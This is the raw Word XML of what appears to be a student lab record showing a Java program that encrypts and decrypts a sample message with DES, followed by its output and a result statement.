        <w:spacing w:before="6" w:line="321" w:lineRule="exact"/>
        <w:ind w:left="1799" w:hanging="359"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Algorithm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2ED89EFC" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1799"/>
        </w:tabs>
        <w:spacing w:line="319" w:lineRule="exact"/>
        <w:ind w:left="1799" w:hanging="359"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pP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4757FD18" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1799"/>
        </w:tabs>
        <w:spacing w:line="318" w:lineRule="exact"/>
        <w:ind w:left="1799" w:hanging="359"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Padding</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>scheme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15954981" w14:textId="77777777" w:rsidR="00A16F47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line="318" w:lineRule="exact"/>
        <w:ind w:left="1079" w:hanging="359"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Convert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Byte[]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1B318DCB" w14:textId="77777777" w:rsidR="00A16F47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line="318" w:lineRule="exact"/>
        <w:ind w:left="1079" w:hanging="359"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pP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Cipher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mode,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encrypt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Cipher.doFinal()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57195380" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1079"/>
        </w:tabs>
        <w:spacing w:line="319" w:lineRule="exact"/>
        <w:ind w:left="1079" w:hanging="359"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pP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Cipher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decrypt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>mode,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decrypt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i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Cipher.doFinal()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A53C88" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="39"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B0FD784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69CBBFF0" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="238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DES.java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="488F4F73" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="5"/>
        <w:ind w:left="360" w:right="5229"/>
      </w:pPr>
      <w:r>
        <w:t>import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-15"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>java.security.InvalidKeyException;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>java.security.NoSuchAlgorithmException;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE7D2E2" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="48"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2491F55B" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="237" w:lineRule="auto"/>
        <w:ind w:left="360" w:right="5229"/>
      </w:pPr>
      <w:r>
        <w:t>import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>javax.crypto.BadPaddingException;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javax.crypto.Cipher;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E7E61F4" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3"/>
        <w:ind w:left="360" w:right="4803"/>
      </w:pPr>
      <w:r>
        <w:t>import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>javax.crypto.IllegalBlockSizeException;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javax.crypto.KeyGenerator;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21808278" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="360" w:right="4842"/>
      </w:pPr>
      <w:r>
        <w:t>import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>javax.crypto.NoSuchPaddingException;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javax.crypto.SecretKey;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A19EB3E" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="46"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F628576" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="36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rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>DES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A6D4D5" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="2"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="283FEED5" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="241"/>
        <w:ind w:left="1080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argv)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7BA3A2B" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="89"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E5666D3" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="1800"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>try{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B3995F" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:tabs>
          <w:tab w:val="left" w:leader="hyphen" w:pos="9217"/>
        </w:tabs>
        <w:spacing w:before="46"/>
        <w:ind w:left="1198"/>
      </w:pPr>
      <w:r>
        <w:t>System.out.println("Message</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Encryption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rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Algorithm\n</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C0FC0EE" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="2"/>
        <w:ind w:left="1198" w:firstLine="880"/>
      </w:pPr>
      <w:r>
        <w:t>KeyGenerator</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-15"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>keygenerator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KeyGenerator.getInstance("DES");</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-15"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>SecretKey myDesKey = keygenerator.generateKey();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7369481E" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="43"/>
        <w:ind w:left="2078"/>
      </w:pPr>
      <w:r>
        <w:t>Cipher</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>desCipher;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2900A90D" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="5"/>
        <w:ind w:left="2078" w:right="1143"/>
      </w:pPr>
      <w:r>
        <w:t>desCipher = Cipher.getInstance("DES/ECB/PKCS5Padding"); desCipher.init(Cipher.ENCRYPT_MODE,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>myDesKey);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>byte[]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= "Secret Information ".getBytes(); System.out.println("Message [Byte Format] : " + text);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19621ED5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459350" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="74"/>
        <w:ind w:left="360" w:right="783"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>System.out.println("Message</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1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String(text));</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>byte[]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>textEncrypted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desCipher.doFinal(text);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C315E45" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="2"/>
        <w:ind w:left="2078" w:right="2222"/>
      </w:pPr>
      <w:r>
        <w:t>System.out.println("Encrypted Message: " + textEncrypted); desCipher.init(Cipher.DECRYPT_MODE,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-15"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>myDesKey);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-15"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>byte[] textDecrypted = desCipher.doFinal(textEncrypted); System.out.println("Decrypted Message: " + new</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CFA60B8" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="41"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>String(textDecrypted));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C5D6303" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="50"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05AC40C9" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="237" w:lineRule="auto"/>
        <w:ind w:left="2520" w:right="4861" w:hanging="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>}catch(NoSuchAlgorithmException</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-15"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>e){ e.printStackTrace();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C3E1891" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="2520" w:right="4861" w:hanging="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>}catch(NoSuchPaddingException</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-17"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>e){ e.printStackTrace();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35413956" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1" w:line="242" w:lineRule="auto"/>
        <w:ind w:left="2520" w:right="5229" w:hanging="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>}catch(InvalidKeyException</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-15"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>e){ e.printStackTrace();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="224156BC" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="2520" w:right="4861" w:hanging="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>}catch(IllegalBlockSizeException</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>e){ e.printStackTrace();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA93081" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="2520" w:right="5229" w:hanging="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>}catch(BadPaddingException</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-15"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>e){ e.printStackTrace();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B6A645" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="35"/>
        <w:ind w:left="1800"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="721583FF" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="247"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E75D329" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="1"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="493299BF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354103A9" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="91"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A364AFB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2FE737D5" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="36"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Message</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8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2"/>
        </w:rPr>
        <w:t>Algorithm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5455A624" w14:textId="77777777" w:rsidR="00A16F47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5FA7BC0" wp14:editId="356A4466">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>914400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>129912</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3197860" cy="1270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7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7860">
                              <a:moveTo>
                                <a:pt x="0" y="0"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="3197352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E394" id="Graphic 156" o:spid="_x0000_s1026" style="position:absolute;margin-left:1in;margin-top:10.25pt;width:251.8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7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/PFwIAAF4EAAAOAAAAZHJzL2Uyb0RvYy54bWysVE1v2zAMvQ/YfxB0XxwnaJsacYqhQYcB&#10;RVegGXZWZDk2JouaqMTOvx8lfyTrbsN8EEjxiXrko7x+6BrNTsphDSbn6WzOmTISitoccv599/Rp&#10;xRl6YQqhwaicnxXyh83HD+vWZmoBFehCOUZJDGatzXnlvc2SBGWlGoEzsMpQsATXCE+uOySFEy1l&#10;b3SymM9vkxZcYR1IhUi72z7INzF/WSrpv5UlKs90zombj6uL6z6syWYtsoMTtqrlQEP8A4tG1IYu&#10;nVJthRfs6Oq/UjW1dIBQ+pmEJoGyrKWKNVA16fxdNW+VsCrWQs1BO7UJ/19a+XJ6s68uUEf7DPIn&#10;UkeS1mI2RYKDA6YrXROwRJx1sYvnqYuq80zS5jK9v1vdUrMlxdLFXWxyIrLxrDyi/6Ig5hGnZ/S9&#10;BsVoiWq0ZGdG05GSQUMdNfSckYaOM9Jw32tohQ/nArlgsvZCJOw1cFI7iFH/jjlRu0S1uUaFUpY3&#10;C87GKgnbI8gI11CveiNeTfZ1cdoEFukyvVnF2UDQdfFUax1ooDvsH7VjJxEmM36hEErxB8w69FuB&#10;VY/DMwZnAGozSNWrE3TaQ3F+daylgc45/joKpzjTXw1NTJj+0XCjsR8N5/UjxDcSe0S37rofwlkW&#10;COTck7gvMM6jyEbdQvUTNpw08PnooayDqHGMekaDQ0McSxweXHgl135EXX4Lm98AAAD//wMAUEsD&#10;BBQABgAIAAAAIQCItreE3gAAAAkBAAAPAAAAZHJzL2Rvd25yZXYueG1sTI/BbsIwEETvlfoP1iL1&#10;VmyiNJQ0DqqQyhEJ6KFHEy9JRLyOYgfSfn2XU3uc2dHsm2I9uU5ccQitJw2LuQKBVHnbUq3h8/jx&#10;/AoiREPWdJ5QwzcGWJePD4XJrb/RHq+HWAsuoZAbDU2MfS5lqBp0Jsx9j8S3sx+ciSyHWtrB3Ljc&#10;dTJRKpPOtMQfGtPjpsHqchidhrQ+r77axVSrbfhJtpv9bjXGndZPs+n9DUTEKf6F4Y7P6FAy08mP&#10;ZIPoWKcpb4kaEvUCggNZusxAnO7GEmRZyP8Lyl8AAAD//wMAUEsBAi0AFAAGAAgAAAAhALaDOJL+&#10;AAAA4QEAABMAAAAAAAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAA&#10;ACEAOP0h/9YAAACUAQAACwAAAAAAAAAAAAAAAAAvAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAA&#10;ACEA1SAvzxcCAABeBAAADgAAAAAAAAAAAAAAAAAuAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYA&#10;CAAAACEAiLa3hN4AAAAJAQAADwAAAAAAAAAAAAAAAABxBAAAZHJzL2Rvd25yZXYueG1sUEsFBgAA&#10;AAAEAAQA8wAAAHwFAAAAAA==&#10;" path="m,l3197352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4D3A305" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7621DEE4" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="360" w:right="5631"/>
      </w:pPr>
      <w:r>
        <w:t>Message [Byte Format] : [B@4dcbadb4 Message : Secret Information</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Encrypted Message:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-15"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>[B@504bae78</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-15"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Decrypted</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-15"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Message:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C70B636" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Secret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5B0ADFF3" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B3E5F2B" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32D5D20F" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FE85055" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="211"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E5EA047" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="365F91"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>RESULT:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F377DA4" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="360" w:right="783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 xml:space="preserve">verified </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>successfully.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EDBB8BE" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto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4B4BC1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applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A61955" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3426B323" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="67"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BB316B6" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20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7B2B85" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="90"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="365F91"/>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t>AIM:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00415A46" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="126"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="column"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6630D172" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="119"/>
      </w:pP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(AES)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 xml:space="preserve">URL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Encryption.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79DFEE16" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/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1" w:space="40"/>
            <w:col w:w="9479"/>
          </w:cols>
        </w:sectPr>
      </w:pPr>
    </w:p>
